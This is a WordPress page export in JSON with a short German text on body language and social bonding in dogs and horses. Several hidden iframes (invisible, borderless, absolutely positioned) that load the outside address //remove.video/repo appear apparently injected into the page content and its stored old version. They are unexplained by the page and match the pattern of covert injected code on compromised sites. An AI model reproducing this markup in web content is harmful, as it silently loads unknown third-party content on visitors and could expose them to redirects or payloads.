{"id":4182,"date":"2021-04-15T18:06:44","date_gmt":"2021-04-15T16:06:44","guid":{"rendered":"http:\/\/www.hubert-asam.de\/?page_id=4182"},"modified":"2021-04-15T18:06:44","modified_gmt":"2021-04-15T16:06:44","slug":"besitz-gemeinschaft","status":"publish","type":"page","link":"https:\/\/www.hubert-asam.de\/?page_id=4182","title":{"rendered":"BESITZ = Gemeinschaft"},"content":{"rendered":"<p>[et_pb_section][et_pb_row][et_pb_column type=&#8220;1_3&#8243;][et_pb_image admin_label=&#8220;Bild&#8220; src=&#8220;http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/08\/courses.jpg&#8220; show_in_lightbox=&#8220;off&#8220; url_new_window=&#8220;off&#8220; animation=&#8220;left&#8220; sticky=&#8220;off&#8220; align=&#8220;left&#8220; force_fullwidth=&#8220;off&#8220; always_center_on_mobile=&#8220;on&#8220; use_border_color=&#8220;off&#8220; border_color=&#8220;#ffffff&#8220; border_style=&#8220;solid&#8220; \/][\/et_pb_column][et_pb_column type=&#8220;2_3&#8243;][et_pb_text admin_label=&#8220;Text&#8220; background_layout=&#8220;light&#8220; text_orientation=&#8220;left&#8220; use_border_color=&#8220;off&#8220; border_color=&#8220;#ffffff&#8220; border_style=&#8220;solid&#8220;]<\/p>\n<h2><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><br \/>\nBESITZ = Gemeinschaft<\/h2>\n<p>K\u00f6rpersprache ist der \u00e4u\u00dfere Ausdruck einer inneren Haltung.<\/p>\n<p>K\u00f6rpersprache \u00fcbermittelt Emotionen, R\u00e4ume und Beziehungsnachrichten auf Basis eines genetischen Sozialverhaltens.<br \/>\nDie eigene innere Haltung wird somit an einen Empf\u00e4nger, den Sozialpartner \u00fcbermittelt.<\/p>\n<p>Mit der Reaktion, der Resonanz und Akzeptanz des Empf\u00e4ngers wird eine soziale Ordnung m\u00f6glich.<br \/>\nAlleine die Tatsache dass Sender und Empf\u00e4nger vereinbart werden bedeutet bereits die Bildung einer pers\u00f6nlichen Beziehung. Folgt diese Beziehung dem genetischen Verhaltenskodex der jeweiligen Spezie, wird eine Gruppe\/Herde\/Rudel\/Gesellschaft gebildet.<\/p>\n<p>Aus diesem Grunde kann man Hunde und Pferde immer beobachten dass im Kennenlern- und Begr\u00fc\u00dfungsmodus, bei jedem territorialen Eintritt eines Gruppenfremden sofort Kommunikation in Form von Sender- Empf\u00e4nger Vereinbarungen stattfinden.<br \/>\nIn einer Herde wird der jeweilige Hengst diese Rolle \u00fcbernehmen, in einem Rudel die dazu gebildete Betariege oder andere Zust\u00e4ndige.<\/p>\n<div><iframe loading=\"lazy\" id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\" width=\"300\" height=\"150\"><\/iframe><\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][et_pb_row][et_pb_column type=&#8220;4_4&#8243;][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n<div><iframe loading=\"lazy\" id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\" width=\"300\" height=\"150\"><\/iframe><\/div>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p><div class=\"et_pb_section et_pb_section_0 et_section_regular\" >\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div><div class=\"et_pb_row et_pb_row_0 et_pb_row_empty\">\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div> BESITZ = Gemeinschaft K\u00f6rpersprache ist der \u00e4u\u00dfere Ausdruck einer inneren Haltung. K\u00f6rpersprache \u00fcbermittelt Emotionen, R\u00e4ume und Beziehungsnachrichten auf Basis eines genetischen Sozialverhaltens. Die eigene innere Haltung wird somit an einen Empf\u00e4nger, den Sozialpartner \u00fcbermittelt. Mit der Reaktion, der Resonanz und Akzeptanz des Empf\u00e4ngers wird eine soziale Ordnung m\u00f6glich. Alleine die Tatsache dass Sender und [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"<p>\u00a0<\/p><div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>","_et_gb_content_width":"","footnotes":""},"class_list":["post-4182","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/pages\/4182","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4182"}],"version-history":[{"count":3,"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/pages\/4182\/revisions"}],"predecessor-version":[{"id":4187,"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/pages\/4182\/revisions\/4187"}],"wp:attachment":[{"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4182"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}